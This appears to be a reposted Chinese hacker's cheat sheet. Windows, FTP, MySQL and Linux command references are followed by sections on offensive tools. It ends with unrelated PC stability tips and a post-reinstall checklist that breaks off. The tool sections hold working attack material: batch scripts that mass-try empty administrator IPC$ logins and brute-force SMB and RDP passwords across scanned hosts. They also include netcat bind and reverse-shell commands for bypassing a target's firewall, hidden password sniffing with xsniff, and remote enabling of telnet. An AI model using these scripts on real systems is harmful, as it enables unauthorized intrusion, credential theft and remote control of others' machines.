ver 在DOS窗口下显示版本信息 
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) 
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 
md 目录名 创建目录 
replace 源文件 要替换文件的目录 替换文件 
ren 原文件名 新文件名 重命名文件名 
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 
type 文件名 显示文本文件的内容 
more 文件名 逐屏显示输出文件 
doskey 要锁定的命令=字符 
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= 
taskmgr 调出任务管理器 
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? 
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; 
regedit /e 注册表文件名 导出注册表 
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.*t /D pub 设定d:\test.*t拒绝pub用户访问。 
cacls 文件名 查看文件的访问用户权限列表 
REM 文本内容 在批处理文件中添加注解 
netsh 查看或更改本地网络配置情况 

【4】 

IIS服务命令: 
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) 
iisreset /start或stop 启动(停止)所有Internet服务 
iisreset /restart 停止然后重新启动所有Internet服务 
iisreset /status 显示所有Internet服务状态 
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 
FTP 命令: (后面有详细说明内容) 
ftp的命令行格式为: 
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 
-d 使用调试方式。 
-n 限制ftp的自动登录,即不使用.netrc文件。 
-g 取消全局文件名。 
help [命令] 或 ?[命令] 查看命令说明 
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 
pwd 列出当前远端主机目录 
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 
mget [remote-files] 从远端主机接收一批文件至本地主机 
mput local-files 将本地主机中一批文件传送至远端主机 
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 
ascii 设定以ASCII方式传送文件(缺省值) 
bin 或 image 设定以二进制方式传送文件 
bell 每完成一次文件传送,报警提示 
cdup 返回上一级目录 
close 中断与远程服务器的ftp会话(与open对应) 
open host[port] 建立指定ftp服务器连接,可指定连接端口 
delete 删除远端主机中的文件 
mdelete [remote-files] 删除一批文件 
mkdir directory-name 在远端主机中建立目录 
rename [from] [to] 改变远端主机中的文件名 
rmdir directory-name 删除远端主机中的目录 
status 显示当前FTP的状态 
system 显示远端主机系统类型 
user user-name [password] [account] 重新以别的用户名登录远端主机 
open host [port] 重新建立一个新的连接 
prompt 交互提示模式 
macdef 定义宏命令 
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 
chmod 改变远端主机的文件权限 
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 
cd remote-dir 进入远程主机目录 
cdup 进入远程主机目录的父目录 
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip 

【5】 

MYSQL 命令: 
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 
(例:mysql -h110.110.110.110 -Uroot -P123456 
注:u与root可以不用加空格,其它也一样) 
exit 退出MYSQL 
mysql*** -u用户名 -p旧密码 password 新密码 修改密码 
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) 
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 
use mysql; 
show tables; 显示库中的数据表 
describe 表名; 显示数据表的结构 
create database 库名; 建库 
use 库名; 
create table 表名 (字段设定列表); 建表 
drop database 库名; 
drop table 表名; 删库和删表 
delete from 表名; 将表中记录清空 
select * from 表名; 显示表中的记录 
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 
win2003系统下新增命令(实用部份): 
shutdown /参数 关闭或重启本地或远程主机。 
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。 
例:shutdown /r /t 0 立即重启本地主机(无延时) 
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 

【6】 

Linux系统下基本命令: 要区分大小写 
uname 显示版本信息(同win2K的 ver) 
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) 
pwd 查询当前所在的目录位置 
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 
cat 文件名 查看文件内容 
cat >abc.*t 往abc.*t文件中写上内容。 
more 文件名 以一页一页的方式显示一个文本文件。 
cp 复制文件 
mv 移动文件 
rm 文件名 删除文件,rm -a 目录名删除目录及子目录 
mkdir 目录名 建立目录 
rmdir 删除子目录,目录内没有文档。 
chmod 设定档案或目录的存取权限 
grep 在档案中查找字符串 
diff 档案文件比较 
find 档案搜寻 
date 现在的日期、时间 
who 查询目前和你使用同一台机器的人以及Login时间地点 
w 查询目前上机者的详细资料 
whoami 查看自己的帐号名称 
groups 查看某人的Group 
passwd 更改密码 
history 查看自己下过的命令 
ps 显示进程状态 
kill 停止某进程 
gcc 黑客通常用它来编译C语言写的文件 
su 权限转换为指定使用者 
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 
ftp ftp连接上某服务器(同win2K) 

【附】批处理命令与变量 

1:for命令及变量 基本格式: 
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。 
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3 

(set):指定一个或一组文件,可使用通配符,如:(D:\user.*t)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 } 

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 
command_parameters:为特定命令指定参数或命令行开关 

IN (set):指在(set)中取值;DO command :指执行command 

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.*t)时 }。 
用法举例: 
@echo off 
echo 用法格式:test.bat *.*.* > test.*t 

for /L %%G in (1 1 254) do echo %1.%%G >>test.*t & net use \\%1.%%G /user:***istrator | find "命令成功完成" >>test.*t 
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.*t中。 

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 
@echo off 
echo 用法格式:ok.bat ip 
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。http://www.jz5u.com 

【7】 

2:if命令及变量 基本格式: 
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。 
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。 
0 指发现并成功执行(真);1 指没有发现、没执行(假)。 
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。 
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ") 
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。 
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.*t. <del test.*t.> else echo test.*t.missing ”,注意命令中的“.” 

(二)【系统外部命令(均需下载相关工具)】 

1、瑞士军刀:nc.exe 

参数说明: 
-h 查看帮助信息 
-d 后台模式 
-e prog程序重定向,一但连接就执行[危险] 
-i secs延时的间隔 
-l 监听模式,用于入站连接 
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C 
-n IP地址,不能用域名 
-o film记录16进制的传输 
-p[空格]端口 本地端口号 
-r 随机本地及远程端口 
-t 使用Telnet交互方式 
-u UDP模式 
-v 详细输出,用-vv将更详细 
-w数字 timeout延时间隔 
-z 将输入,输出关掉(用于扫锚时) 
基本用法: 
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 
nc -l -p 80 开启本机的TCP 80端口并监听 
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 
高级用法: 
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 
nc -L -p 80 > c:\log.*t 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.*t 
nc -L -p 80 < c:\honeyport.*t 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 
本机上用:nc -l -p 本机端口 
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K 
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 
备 注: 
| 管道命令 
< 或 > 重定向命令。“<”,例如:tlntadmn < test.*t 指把test.*t的内容赋值给tlntadmn命令 
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.*t 意思是:后台执行dir,并把结果存在d:\log.*t中 
>与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。 
如:@dir c:\winnt >> d:\log.*t和@dir c:\winnt > d:\log.*t二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。 

【8】 

2、扫锚工具:xscan.exe 

基本格式 
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 
检测项目 
-active 检测主机是否存活 
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议) 
-port 检测常用服务的端口状态 
-ftp 检测FTP弱口令 
-pub 检测FTP服务匿名用户写权限 
-pop3 检测POP3-Server弱口令 
-smtp 检测SMTP-Server漏洞 
-sql 检测SQL-Server弱口令 
-smb 检测NT-Server弱口令 
-iis 检测IIS编码/解码漏洞 
-cgi 检测CGI漏洞 
-nasl 加载Nessus攻击脚本 
-all 检测以上所有项目 
其它选项 
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 
-l 显示所有网络适配器 
-v 显示详细扫描进度 
-p 跳过没有响应的主机 
-o 跳过没有检测到开放端口的主机 
  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 
用法示例 
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 
xscan -file hostlist.*t -port -cgi -t 200,5 -v -o 检测“hostlist.*t”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机www.jz5u.com 

【9】 

3、命令行方式嗅探器: xsniff.exe 
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 
参数说明 
-tcp 输出TCP数据报 
-udp 输出UDP数据报 
-icmp 输出ICMP数据报 
-pass 过滤密码信息 
-hide 后台运行 
-host 解析主机名 
-addr IP地址 过滤IP地址 
-port 端口 过滤端口 
-log 文件名 将输出保存到文件 
-asc 以ASCII形式输出 
-hex 以16进制形式输出 
用法示例 
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 

4、终端服务密码破解: tscrack.exe 

参数说明 
-h 显示使用帮助 
-v 显示版本信息 
-s 在屏幕上打出解密能力 
-b 密码错误时发出的声音 
-t 同是发出多个连接(多线程) 
-N Prevent System Log entries on targeted server 
-U 卸载移除tscrack组件 
-f 使用-f后面的密码 
-F 间隔时间(频率) 
-l 使用-l后面的用户名 
-w 使用-w后面的密码字典 
-p 使用-p后面的密码 
-D 登录主页面 
用法示例 
tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的***istrator的登陆密码 
tscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆192.168.0.1的***istrator用户 
@if not exist ipcscan.*t goto noscan 
@for /f "tokens=1 delims= " %%i in (3389.*t) do call hack.bat %%i 
nscan 
@echo 3389.*t no find or scan faild 
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.*t) 
3389.bat意思是:从3389.*t文件中取一个IP,接着运行hack.bat 
@if not exist tscrack.exe goto noscan 
@tscrack %1 -l ***istrator -w pass.dic >>rouji.*t 
:noscan 
@echo tscrack.exe no find or scan faild 
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.*t、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) 
hack.bat意思是:运行tscrack.exe用字典暴破3389.*t中所有主机的***istrator密码,并将破解结果保存在rouji.*t文件中。 

5、其它: 

Shutdown.exe 
Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。) 
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙) 
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息 
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。 
OpenTelnet.exe (远程开启telnet工具) 
opentelnet.exe \\IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet \\ip 连接上对方。 
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。 

ResumeTelnet.exe (OpenTelnet附带的另一个工具) 
resumetelnet.exe \\IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。 

【10】 

6、FTP命令详解: 

FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。 

FTP的命令行格式为: 
ftp -v -d -i -n -g [主机名] ,其中 

-v 显示远程服务器的所有响应信息; 

-n 限制ftp的自动登录,即不使用;.n etrc文件; 

-d 使用调试方式; 

-g 取消全局文件名。 

FTP使用的内部命令如下(中括号表示可选项): 

1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 
2.$ macro-ame[args]: 执行宏定义macro-name。 

3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。 
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。 

5.ascii:使用ascii类型传输方式。 
6.bell:每个命令执行完毕后计算机响铃一次。 

7.bin:使用二进制文件传输方式。 
8.bye:退出ftp会话过程。 

9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 
10.cd remote-dir:进入远程主机目录。 

11.cdup:进入远程主机目录的父目录。 
12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。 

13.close:中断与远程服务器的ftp会话(与open对应)。 
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。 

15.delete remote-file:删除远程主机文件。 
16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。 

17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。 
18.disconnection:同close。 

19.form format:将文件传输方式设置为format,缺省为file方式。 
20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。 

21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。 
22.hash:每传输1024字节,显示一个hash符号(#)。 

23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。 
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 

25.image:设置二进制传输方式(同binary)。 
26.lcd[dir]:将本地工作目录切换至dir。 

27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 

29.mdelete[remote-file]:删除远程主机文件。 
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。 

31.mget remote-files:传输多个远程文件。 
32.mkdir dir-name:在远程主机中建一目录。 

33.mls remote-file local-file:同nlist,但可指定多个文件名。 
34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。 

35.modtime file-name:显示远程主机文件的最后修改时间。 
36.mput local-file:将多个文件传输至远程主机。 

37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。 
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。 

39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。 
40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。 

41.open host[port]:建立指定ftp服务器连接,可指定连接端口。 
42.passive:进入被动传输方式。 

43.prompt:设置多个文件传输时的交互提示。 
44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。 
45.put local-file[remote-file]:将本地文件local-file传送至远程主机。 
46.pwd:显示远程主机的当前工作目录。 

47.quit:同bye,退出ftp会话。 
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst. 

49.recv remote-file[local-file]:同get。 
50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。 

51.rhelp[cmd-name]:请求获得远程主机的帮助。 
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。 

53.rename[from][to]:更改远程主机文件名。 
54.reset:清除回答队列。 

55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。 
56.rmdir dir-name:删除远程主机目录。 

57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。 
58.send local-file[remote-file]:同put。 

59.sendport:设置PORT命令的使用。 
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。 

61.size file-name:显示远程主机文件大小,如:site idle 7200。 
62.status:显示当前ftp状态。www.jz5u.com 

63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。 
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。 

65.system:显示远程主机的操作系统类型。 
66.tenex:将文件传输类型设置为TENEX机的所需的类型。 

67.tick:设置传输时的字节计数器。 
68.trace:设置包跟踪。 

69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。 
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3 

71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。 
72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on. 

73.?[cmd]:同help. 

【11】 

7:计算机运行命令全集 winver---------检查Windows版本 
wmimgmt.msc----打开windows管理体系结构 
wupdmgr--------windows更新程序 
winver---------检查Windows版本 
wmimgmt.msc----打开windows管理体系结构 
wupdmgr--------windows更新程序 
wscript--------windows脚本宿主设置 
write----------写字板winmsd-----系统信息 
wiaacmgr-------扫描仪和照相机向导 
winchat--------XP自带局域网聊天 
mem.exe--------显示内存使用情况 
Msconfig.exe---系统配置实用程序 
mplayer2-------简易widnows media player 
mspaint--------画图板 
mstsc----------远程桌面连接 
mplayer2-------媒体播放机 
magnify--------放大镜实用程序 
mmc------------打开控制台 
mobsync--------同步命令 
dxdiag---------检查DirectX信息 
drwtsn32------ 系统医生 
devmgmt.msc--- 设备管理器 
dfrg.msc-------磁盘碎片整理程序 
diskmgmt.msc---磁盘管理实用程序 
dcomcnfg-------打开系统组件服务 
ddeshare-------打开DDE共享设置 
dvdplay--------DVD播放器 
net stop messenger-----停止信使服务 
net start messenger----开始信使服务 
notepad--------打开记事本 
nslookup-------网络管理的工具向导 
ntbackup-------系统备份和还原 
narrator-------屏幕"讲述人" 
ntmsmgr.msc----移动存储管理器 
ntmsoprq.msc---移动存储管理员操作请求 
netstat -an----(TC)命令检查接口 
syncapp--------创建一个公文包 
sysedit--------系统配置编辑器 
sigverif-------文件签名验证程序 
sndrec32-------录音机 
shrpubw--------创建共享文件夹 
secpol.msc-----本地安全策略 
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 
services.msc---本地服务设置 
Sndvol32-------音量控制程序 
sfc.exe--------系统文件检查器 
sfc /scannow---windows文件保护 
tsshutdn-------60秒倒计时关机命令 
tourstart------xp简介(安装完成后出现的漫游xp程序) 
taskmgr--------任务管理器 
eventvwr-------事件查看器 
eudcedit-------造字程序 
explorer-------打开资源管理器 
packager-------对象包装程序 
perfmon.msc----计算机性能监测程序 
progman--------程序管理器 
regedit.exe----注册表 
rsop.msc-------组策略结果集 
regedt32-------注册表编辑器 
rononce -p ----15秒关机 
regsvr32 /u *.dll----停止dll文件运行 
regsvr32 /u zipfldr.dll------取消ZIP支持 
cmd.exe--------CMD命令提示符 
chkdsk.exe-----Chkdsk磁盘检查 
certmgr.msc----证书管理实用程序 
calc-----------启动计算器 
charmap--------启动字符映射表 
cliconfg-------SQL SERVER 客户端网络实用程序 
Clipbrd--------剪贴板查看器 
conf-----------启动netmeeting 
compmgmt.msc---计算机管理 
cleanmgr-------**整理 
ciadv.msc------索引服务程序 
osk------------打开屏幕键盘 
odbcad32-------ODBC数据源管理器 
oobe/msoobe /a----检查XP是否激活 
lusrmgr.msc----本机用户和组 
logoff---------注销命令 
iexpress-------木马捆绑工具,系统自带 
Nslookup-------IP地址侦测器 
fsmgmt.msc-----共享文件夹管理器 
utilman--------辅助工具管理器 
gpedit.msc-----组策略
 

防止死机二十四招

1.CPU、显示卡等配件不要超频过高,要注意温度,否则,在启动或运行时会莫名其妙地重启或死机。

2.在更换电脑配件时,一定要插好,因为配件接触不良会引起系统死机。

3.BIOS设置要恰当,虽然建议将BIOS设置为最优,但所谓最优并不是最好的,有时最优的设置反倒会引起启动或者运行死机。

4.最好配备稳压电源,以免电压不稳引起死机。

5.如果有条件的话,加装一个UPS,使电脑在停电后不会造成死机。

6.对来历不明的软盘和光盘,不要轻易使用,对E-mail中所附的软件,要用KV300、瑞星等杀毒软件检查后再使用,以免传染病毒后,是系统死机。

7.在应用软件未正常结束时,别关闭电源,否则会造成系统文件损坏或丢失,引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说,这点非常重要。

8.在安装应用软件当中,若出现提示对话框“是否覆盖文件”,最好选择不要覆盖。因为通常当前系统文件是最好的,不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

9.在卸载软件时,不要删除共享文件,因为某些共享文件可能被系统或者其他程序使用,一旦删除这些文件,会使应用软件无法启动而死机,或者出现系统运行死机。

10.设置硬件设备时,最好检查有无保留中断号(IRQ),不要让其他设备使用该中断号,否则引起IRQ冲突,从而引起系统死机。

11.在加载某些软件时,要注意先后次序,由于有些软件编程不规范,在运行是不能排在第一,而要放在最后运行,这样才不会引起系统管理的混乱。

12.在运行大型应用软件时(如OFFICE 2000),不要在运行状态下退出以前运行的程序,否则会引起整个Windows98系统的崩溃。

13.在内存较小的情况下(如4MB-16MB),最好不要运行占用内存较大的应用程序,否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。

14.对于系统文件或重要文件,最好使用隐含属性,这样才不致于因误操作而删除或者覆盖这些文件。

15.修改硬盘主引导记录时,最好先保存原来的记录,防止因修改失败而无法恢复原来的硬盘主引导记录。

16.最好少用软件的测试版,因为测试版在某方面不够稳定,在使用后会使系统无法启动。

17.在Windows95/98中尽量不要运行16位应用程序,因为16位的应用程序会与Windows中的32位应用程序产生冲突,从而引起死机或无法启动。

18.在升级BIOS之前,应确定所升级的BIOS版本,同时应先保存一下原先的版本,以免升级错误而使系统无法启动。

19.尽量不要使用盗版的软件,因为这些软件里隐藏着大量病毒,一旦执行,会自动修改你的系统,使系统在运行中出现死机。

20.在机箱中,可能蕴藏了大量的灰尘,灰尘若接触了配件的电路,会使系统不稳定或死机。

21.在执行磁盘碎片整理的时后,不要运行大型应用软件,否则引起死机。

22.用杀毒软件检查硬盘期间,不要运行其它的应用程序,以防止系统死机。  

23.在上网的时候,不要一次打开太多的浏览窗口,导致资源不足,引起死机。  

24.在关闭计算机的时候,不要直接使用机箱中的电源按钮,因为直接使用电源按钮会引起文件的丢失,使下次不能正常启动,从而造成系统死机。  

对经常死机朋友,请试试以上方法,相信会对大家有一定的帮助的,有时候要针对具体情况来采取不同的对策,切不可生搬硬套哦!

 

重装系统后6件必做大事

玩电脑就免不了重装系统,这对于电脑高手来说,是再轻松不过的事情了,可是你知道电脑高手最头痛的的是什么时候吗?是安装完了系统以后要做的事情,这可马虎不得,因为一旦做得不好,就会导致前功尽弃,甚至有可能会造成数据丢失或者再次重装系统。

一、电脑安全与防护

安装完系统的第一步应该是做好电脑的安全防护,比如修改管理员的用户名和口令、关掉无关的共享、打上关键补丁、安装防病毒软件并升级病毒库、关掉无用的共享、关闭危险的电脑端口、禁止TCP/IP上的NetBIOS等。

1.关闭默认共享
